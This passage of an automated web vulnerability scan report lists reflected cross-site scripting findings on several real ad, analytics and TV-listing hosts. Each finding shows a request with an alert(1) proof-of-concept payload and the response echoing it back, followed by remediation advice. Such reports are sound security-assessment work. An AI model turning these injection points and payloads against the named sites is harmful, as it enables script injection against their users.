Path:   /adscgen/d_layer.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6b3'%3balert(1)//069defae92d was submitted in the site parameter. This input was echoed as cb6b3';alert(1)//069defae92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8cb6b3'%3balert(1)//069defae92d HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Content-Type: text/html
Content-Length: 12193

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...

   DL_SurveyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=918801&from_node=28067&site=8cb6b3';alert(1)//069defae92d&frame=&lang=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL
...[SNIP]...
4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c196d'-alert(1)-'13129391a78 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:07 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: LP=1316277547; expires=Wed, 21 Sep 2011 20:39:07 GMT; path=/; domain=.questionmarket.com
Content-Length: 2445
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
df=biggestframe;
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=c196d'-alert(1)-'13129391a78&from_node=28067&site=8';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e)
...[SNIP]...
4.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c194e'-alert(1)-'248affad422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:40:24 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1316277624; expires=Wed, 21 Sep 2011 20:40:24 GMT; path=/; domain=.questionmarket.com
Content-Length: 2448
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...

d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8&c194e'-alert(1)-'248affad422=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...
4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e7bf'-alert(1)-'5f3356cd700 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:34 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1316277574; expires=Wed, 21 Sep 2011 20:39:34 GMT; path=/; domain=.questionmarket.com
Content-Length: 2447
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
}
d=df.document;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=81e7bf'-alert(1)-'5f3356cd700';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...
4.108. http://api.uproxx.com/ulink/feed [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.uproxx.com
Path:   /ulink/feed

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 9e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7 was submitted in the pid parameter. This input was echoed as 9e64b<img src=a onerror=alert(1)>fb9c84b95b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ulink/feed?pid=1639e64b<img%20src%3da%20onerror%3dalert(1)>fb9c84b95b7&limit=12&c_cats=3,15,17,&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:14:57 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5055

UPROXXJSON(
[{"category":"TV \/ Movie News","content_title":"Megan Fox Gains Weight, Talks Future","image_url":"http:\/\/ua.uproxxcdn.com\/ejYFCvnvi4xlveI.jpg","content_clicks":"344","source_title":"Moviefone","source_url":"http:\/\/moviefone.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=moviefone.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a107970o1639e64b<img src=a onerror=alert(1)>fb9c84b95b7"},{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10982","source_title":"Uproxx","source_ur
...[SNIP]...
4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180cc"-alert(1)-"5baa4485817 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j180cc"-alert(1)-"5baa4485817&zip=98101&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='t
...[SNIP]...
4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the ap request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c76"-alert(1)-"73c548fbb0a was submitted in the ap parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 459
Content-Length: 459
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:36 GMT
Date: Sat, 17 Sep 2011 16:23:36 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptge2c76"-alert(1)-"73c548fbb0a&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;

validRequest = false;

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascri
...[SNIP]...
4.111. http://api.zap2it.com/tvlistings/zcConnector.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c254f"-alert(1)-"d4b6e154fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 486
Content-Length: 486
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:40 GMT
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518&c254f"-alert(1)-"d4b6e154fab=1";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server
...[SNIP]...
4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the stnlt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f99"-alert(1)-"c1b02f4a4e4 was submitted in the stnlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:39 GMT
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518a9f99"-alert(1)-"c1b02f4a4e4";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javascript' src='" + server +
...[SNIP]...
4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the v request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad912"-alert(1)-"5380e65f37c was submitted in the v parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:37 GMT
Date: Sat, 17 Sep 2011 16:23:37 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2ad912"-alert(1)-"5380e65f37c&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write(
...[SNIP]...
4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7182"-alert(1)-"14f2f041e46 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?";


if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javasc
...[SNIP]...
4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49914<script>alert(1)</script>7a5c26187c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=249914<script>alert(1)</script>7a5c26187c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:28:32 GMT
Date: Sat, 17 Sep 2011 16:28:32 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"249914<script>alert(1)</script>7a5c26187c", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload e4c54<script>alert(1)</script>6027ce286c9 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16122&c5=44988&c6=&c10=237868e4c54<script>alert(1)</script>6027ce286c9&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:54:19 GMT
Date: Sat, 17 Sep 2011 16:54:19 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16122", c5:"44988", c6:"", c10:"237868e4c54<script>alert(1)</script>6027ce286c9", c15:"", c16:"", r:""});


4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8b174<script>alert(1)</script>253c92feb83 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=8b174<script>alert(1)</script>253c92feb83&tm=799493 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:36:32 GMT
Date: Sat, 17 Sep 2011 16:36:32 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
